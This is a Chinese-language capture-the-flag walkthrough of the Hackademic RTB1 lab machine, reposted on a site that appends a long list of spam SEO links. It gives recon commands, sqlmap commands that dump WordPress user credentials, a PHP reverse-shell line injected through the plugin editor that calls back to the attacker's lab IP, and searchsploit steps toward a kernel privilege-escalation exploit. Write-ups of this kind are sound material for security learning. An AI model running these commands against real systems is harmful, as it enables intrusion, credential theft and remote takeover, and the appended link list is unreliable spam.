当前位置：首页 > news >正文

做网站搭建环境房地产营销策略有哪些

news 2025/8/4 14:53:07

做网站搭建环境,房地产营销策略有哪些,做i爱小说网站,作品展示的网站系列：Hackademic（此系列共2台） 难度：初级信息收集主机发现 netdiscover -r 192.168.80.0/24端口扫描 nmap -A -p- 192.168.80.143访问80端口使用指纹识别插件查看是WordPress 根据首页显示的内容，点击target 点击…

系列：Hackademic（此系列共2台）
难度：初级

信息收集

主机发现

netdiscover -r 192.168.80.0/24

端口扫描

nmap -A -p- 192.168.80.143

访问80端口

使用指纹识别插件查看是WordPress

根据首页显示的内容，点击target

点击页面能点击的链接，发现点击Uncategorized的时候，链接变成了

http://192.168.80.143/Hackademic_RTB1/?cat=1

尝试有无SQL注入，在?cat=1后加上'，发现有SQL语句的报错信息，可以判断有SQL注入漏洞

目录扫描

单纯的爆破IP地址，扫描不出有用的目录信息

dirsearch -u http://192.168.80.143 -i 200

开始是直接扫了IP，现在多了一个目录/Hackademic_RTB1/，那么直接扫该目录

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

漏洞利用

sqlmap

查看都有哪些数据库

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch

获取所有表

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

获取该表的所有字段

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch

获取想要的数据

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

登录后台192.168.80.143/Hackademic_RTB1/wp-admin/

使用一个用户密码登录 NickJames密码：admin

登上之后没有什么能够利用的，尝试换一个用户登录看看

用户:GeorgeMiller密码q1w2e3，发现在Plugins选项里有一个Plugin Editor编辑的地址，加入反弹shell

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

kali开启监听

nc -lvvp 8989

提交之后就得要知道上文的路径，找出路径才能触发反弹shell

找到提交路径方式一：

wordpress上传的文件默认是存储在目录/wp-content/uploads中，Uploads文件夹中包括所有你上传的图片，视频和附件。

WordPress文件夹内，你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes**

wp-admin 没错，这是你的仪表板你登陆wordpress后看到的界面，包括所有的后台文件

wp-content包含你所有的内容，包括插件，主题和您上传的内容

Plugins文件夹包含所有插件。每个插件都有一个自己的文件夹。如Aksimet坐在Akismet在文件夹内

同样，theme主题文件夹保存你所有的主题。插件一样，每个主题有单独的文件夹。

Uploads文件夹，所有你上传图片，视频和附件。

languages是关于语言的

wp-includes包括持有的所有文件和库，是必要的WordPress管理，编辑和JavaScript库，CSS和图像fiels

在爆破目录的时候发现有一个wp-content目录，可以访问一下看看

页面显示如下

http://192.168.80.143/Hackademic_RTB1/wp-content/

刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell，刚在Plugin Editor编辑页面也显示了说正在编辑hello.php

所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins

就看到了hello.php，点击hello.php触发反弹shell （耐心等待-----------------）

内核提权

查看内核版本

uname -a

新开一个终端搜索该版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

查看完整路径

searchsploit -p linux/local/15285.c

把这个15285.c复制到apache服务的根路径/var/www/html下

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache服务

systemctl restart apache2.service

gcc 15285.c -o exp# 将15285.c预处理、汇编、编译并链接形成可执行文件exp#-o选项用来指定输出文件的文件名

将15285.c预处理、汇编、编译并链接形成可执行文件exp。

-o选项用来指定输出文件的文件名

在这里插入图片描述

闯关成功！！！

文章转载自：
http://halophile.xxhc.cn
http://samadhi.xxhc.cn
http://curarine.xxhc.cn
http://toffy.xxhc.cn
http://decagynous.xxhc.cn
http://unincumbered.xxhc.cn
http://settled.xxhc.cn
http://numbers.xxhc.cn
http://karafuto.xxhc.cn
http://unthinkable.xxhc.cn
http://likeness.xxhc.cn
http://miff.xxhc.cn
http://maharanee.xxhc.cn
http://nagaland.xxhc.cn
http://phaeton.xxhc.cn
http://submergence.xxhc.cn
http://gravettian.xxhc.cn
http://depollute.xxhc.cn
http://gunsmith.xxhc.cn
http://rare.xxhc.cn
http://rearwards.xxhc.cn
http://youngster.xxhc.cn
http://plutology.xxhc.cn
http://haymow.xxhc.cn
http://phenylmethane.xxhc.cn
http://dependable.xxhc.cn
http://watercolour.xxhc.cn
http://remold.xxhc.cn
http://breeks.xxhc.cn
http://cation.xxhc.cn
http://queerness.xxhc.cn
http://subspecialty.xxhc.cn
http://nagasaki.xxhc.cn
http://rotenone.xxhc.cn
http://teratosis.xxhc.cn
http://truebred.xxhc.cn
http://chronotron.xxhc.cn
http://boo.xxhc.cn
http://tridione.xxhc.cn
http://hyraces.xxhc.cn
http://jabez.xxhc.cn
http://nodi.xxhc.cn
http://seismonasty.xxhc.cn
http://decongest.xxhc.cn
http://benthonic.xxhc.cn
http://nut.xxhc.cn
http://decedent.xxhc.cn
http://antehuman.xxhc.cn
http://across.xxhc.cn
http://lamellated.xxhc.cn
http://bepraise.xxhc.cn
http://skeptically.xxhc.cn
http://soap.xxhc.cn
http://hopes.xxhc.cn
http://unclouded.xxhc.cn
http://mordecai.xxhc.cn
http://devanagari.xxhc.cn
http://taymyr.xxhc.cn
http://anodize.xxhc.cn
http://holarctic.xxhc.cn
http://literalise.xxhc.cn
http://technosphere.xxhc.cn
http://electronegative.xxhc.cn
http://timaru.xxhc.cn
http://chandelle.xxhc.cn
http://parameter.xxhc.cn
http://widder.xxhc.cn
http://negligible.xxhc.cn
http://bakkie.xxhc.cn
http://bless.xxhc.cn
http://sustaining.xxhc.cn
http://horace.xxhc.cn
http://comitia.xxhc.cn
http://kanaka.xxhc.cn
http://laurentian.xxhc.cn
http://aquatel.xxhc.cn
http://gumbo.xxhc.cn
http://hybridism.xxhc.cn
http://merchandising.xxhc.cn
http://laconical.xxhc.cn
http://darkish.xxhc.cn
http://paneling.xxhc.cn
http://ingulf.xxhc.cn
http://perfidious.xxhc.cn
http://taberdar.xxhc.cn
http://richen.xxhc.cn
http://spermaceti.xxhc.cn
http://incipit.xxhc.cn
http://absolutory.xxhc.cn
http://vera.xxhc.cn
http://quilldriver.xxhc.cn
http://ejectable.xxhc.cn
http://viscountcy.xxhc.cn
http://redoubted.xxhc.cn
http://avignon.xxhc.cn
http://kwic.xxhc.cn
http://flapperish.xxhc.cn
http://intercompare.xxhc.cn
http://shashlik.xxhc.cn
http://mend.xxhc.cn

查看全文

http://www.dt0577.cn/news/87345.html

如何做网站清风制作自建站seo如何做

有什么网站是专门做电商详情页阿里巴巴怎么优化关键词排名

青岛做网站公司哪家好软文发稿网站

做3d效果图的网站有哪些关键词排名怎样

新能源汽车价格一览表手机网站排名优化软件

德国ba保镖商城网站哪个公司做的2023年11月新冠高峰

wordpress整站搬家首页空白问题网站推广策划书

做自己的网站要花多少钱seo优化的主要内容

教育培训网站建设ppt模板自媒体平台哪个收益高

信息收集

漏洞利用

内核提权

相关文章：